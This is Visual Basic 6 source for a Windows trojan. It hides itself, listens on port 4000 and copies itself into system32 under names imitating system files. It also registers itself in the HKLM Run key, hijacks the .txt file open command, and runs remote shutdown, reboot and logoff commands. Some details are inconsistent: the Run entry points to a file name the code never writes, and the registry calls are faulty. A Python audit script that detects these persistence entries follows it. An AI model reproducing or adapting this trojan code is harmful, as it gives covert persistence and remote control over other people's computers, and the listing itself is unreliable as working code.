'Main form: FRM_WINSOCK
'Winsock control: G_Server
Private Sub Form_Load()
    'Hide process
    'Read host IP
    HostIP = G_Server.LocalIP
    'Read host name
    HostName = G_Server.LocalHostName
    With Me
        'Set local default port
        .G_Server.LocalPort = 4000
        'Listen
        .G_Server.Listen
        'Hide form
        .Hide
    End With
    'Get the Trojan's directory
    Dim sCurrentPath As String
    sCurrentPath = App.Path & "/" & App.EXEName & ".exe"
    Debug.Print sCurrentPath
    Dim sSystemDir As String
    sSystemDir = "C:/winnt/system32"
    On Error Resume Next
    'Copy the file into the system directory as Systrsy.exe
    FileCopy sCurrentPath, sSystemDir & "/systy.exe"
    On Error Resume Next
    'Copy the file into the system directory as TXTVIEW.EXE
    FileCopy sCurrentPath, sSystemDir & "/txtview.exe"
    'Call
    Call StartupGroup
    Call WriteToTxt
    'Is it already running?
    If App.PrevInstance Then
        End
    End If
End Sub

Private Sub G_Server_ConnectionRequest(ByVal requestID As Long)
    With Me
        If .G_Server.State <> sckClosed Then G_Server.Close
        .G_Server.Accept requestID
    End With
End Sub

Private Sub G_Server_DataArrival(ByVal bytesTotal As Long)
    Dim strData As String
    With Me
        'Receive the client's request
        .G_Server.GetData strData
        Select Case strData
            Case "Exit"
                'Shutdown
                Call ExitWindowsEx(EWX_SHUTDOWN, 0)
            Case "Reboot"
                'Restart
                Call ExitWindowsEx(EWX_REBOOT, 0)
            Case "logoff"
                'Log off
                Call ExitWindowsEx(EWX_LOGOFF, 0)
        End Select
    End With
End Sub

'modAPI module
'Declare global variables
Public HostIP As Variant
Public HostName As Variant

'Declare API functions
Public Declare Function ExitWindowsEx Lib "user32" (ByVal uFlags As Long, _
    ByVal dwReserved As Long) _
    As Long
Public Const EWX_LOGOFF = 0
Public Const EWX_REBOOT = 2
Public Const EWX_SHUTDOWN = 1
Public Declare Function ClipCursor Lib "user32" (lpRect As Any) As Long
Public Type RECT
    Left As Long
    Top As Long
    Right As Long
    Bottom As Long
End Type
Public Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, _
    ByVal lpSubKey As String, _
    phkResult As Long) _
    As Long
Public Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, _
    ByVal lpValueName As String, _
    ByVal Reserved As Long, _
    ByVal dwType As Long, _
    lpData As Any, _
    ByVal cbData As Long) _
    As Long
Public Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, _
    ByVal lpSubKey As String, _
    phkResult As Long) _
    As Long
Public Const REG_BINARY = 3
Public Const REG_SZ = 1
Public Const HKEY_LOCAL_MACHINE = &H80000002
Public Const HKEY_CLASSES_ROOT = &H80000000
Declare Sub keybd_event Lib "user32" (ByVal bVk As Byte, _
    ByVal bScan As Byte, _
    ByVal dwFlags As Long, _
    ByVal dwExtraInfo As Long)

'Procedure that writes the registry startup group
Public Sub StartupGroup()
    Dim sKey As String
    Dim result As Long
    Dim hKeyID As Long
    Dim sKeyVal As String
    'Startup key name, chosen to look similar to a system file
    sKey = "SYSTRSY"
    'Trojan file path; GetSystemDirectory can be used to get the system path
    sKeyVal = "C:/winnt/system32/systrsy.exe"
    result = RegOpenKey(HKEY_LOCAL_MACHINE, "Software/Microsoft/Windows/CurrentVersion/Run", hKeyID)
    If result = 0 Then
        Debug.Print hKeyID & "/n"
        result = RegSetValueEx(hKeyID, sKey, 0&, REG_SZ, sKeyVal, Len(sKey) + 1)
        Debug.Print result & "/n"
    End If
End Sub

'Association with TXT files
Public Sub WriteToTxt()
    Dim result As Long
    Dim hKeyID As Long
    Dim sKey As String
    Dim sKeyVal As String
    sKey = "TXTFILE/Shell/Open/Command"
    sKeyVal = "C:/Windows/System/TxtView.exe"
    result = RegOpenKey(HKEY_CLASSES_ROOT, sKeyVal, hKeyID)
    If result = 0 Then
        Debug.Print hKeyID & "/n"
        result = RegSetValueEx(hKeyID, sKey, 0&, REG_SZ, sKeyVal, Len(sKeyVal) + 1)
        Debug.Print result
    End If
End Sub
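
A defender-side check for the two persistence points this listing writes to (the HKLM Run key and the txtfile open command), added here as an example and not part of the original listing. It parses `reg query` text output and flags Run entries whose image name imitates a system binary, plus a .txt open handler that is not notepad.exe. The allow-list, the 0.8 similarity cutoff and the sample output are assumptions constructed for illustration.

```python
import difflib
import ntpath
import re

# Assumed allow-list of genuine Windows binary names (illustrative, not exhaustive).
KNOWN = ["systray.exe", "svchost.exe", "explorer.exe", "notepad.exe", "winlogon.exe"]
RUN_KEY = r"hkey_local_machine\software\microsoft\windows\currentversion\run"
TXT_KEY = r"hkey_classes_root\txtfile\shell\open\command"
# Constructed sample in `reg query` output format, built from the listing's names.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SYSTRSY    REG_SZ    C:\winnt\system32\systrsy.exe
    OneDrive    REG_SZ    "C:\Users\a\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
HKEY_CLASSES_ROOT\txtfile\shell\open\command
    (Default)    REG_SZ    C:\Windows\System\TxtView.exe %1
"""
VALUE_RE = re.compile(r"^\s{4}(.+?)\s{4}(REG_\w+)\s{4}(.*)$")
EXE_RE = re.compile(r'"?(.+?\.exe)', re.IGNORECASE)

def parse_reg_query(text):
    """Return {lowercased key path: {value name: data}} from `reg query` output."""
    keys, current = {}, None
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = m.group(3)
        elif line.startswith("HKEY_"):
            current = line.strip().lower()
            keys[current] = {}
    return keys

def image_name(command):
    """Lowercased file name of the executable a command line launches, or ''."""
    m = EXE_RE.match(command.strip())
    return ntpath.basename(m.group(1)).lower() if m else ""

def audit(text):
    """Flag Run values that imitate system binaries and a replaced .txt open handler."""
    keys, findings = parse_reg_query(text), []
    for name, data in keys.get(RUN_KEY, {}).items():
        exe = image_name(data)
        near = difflib.get_close_matches(exe, KNOWN, n=1, cutoff=0.8)
        if exe and exe not in KNOWN and near:
            findings.append(("run-lookalike", name, exe, near[0]))
    for name, data in keys.get(TXT_KEY, {}).items():
        exe = image_name(data)
        if exe != "notepad.exe":
            findings.append(("txt-handler", name, exe, "notepad.exe"))
    return findings
```

Calling `audit()` on the text saved from `reg query` for those two keys returns one tuple per finding: rule, value name, observed image name, and the expected or imitated name.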